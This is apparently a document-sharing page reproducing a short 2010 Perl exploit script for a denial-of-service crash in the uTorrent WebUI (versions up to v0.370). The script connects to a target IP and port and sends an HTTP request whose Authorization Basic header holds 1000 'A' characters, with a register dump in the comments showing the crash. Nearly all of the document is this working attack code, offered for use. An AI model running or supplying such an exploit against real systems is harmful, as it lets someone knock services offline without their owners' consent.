Docstoc

uTorrent WebUI v0.370 Authorization header DoS Exploit

Document Sample
uTorrent WebUI v0.370 Authorization header DoS Exploit Powered By Docstoc
					                         uTorrent WebUI v0.370 Authorization header DoS Exploit                    Page 1/1
   1   #!/usr/bin/perl
   2   # Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit
   3   # Date: 2010−04−01
   4   # Author: zombiefx darkernet[at]gmail.com<http://gmail.com>
   5   # Version: µTorrent 2.0 (build 18488) / WebUI <=v0.370
   6   # Tested on: Windows XP SP3
   7   #Code:
   8   # lame usage: ./UTweb.pl <IP> <PORT>
   9   # EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94
  10   # EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62
  11   # Good luck! corelanc0d3r
  12
  13   use warnings;
  14   use strict;
  15   use IO::Socket;
  16   my $nonbase64 = "\x41" x 1000; # That was pointless
  17   my $sock = IO::Socket::INET−>new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => ’tcp’);
  18   print $sock "GET / HTTP/1.1\r\n".
  19   "Authorization: Basic $nonbase64\r\n\r\n";




zombiefx darkernet                                                                                 04/02/2010

				
DOCUMENT INFO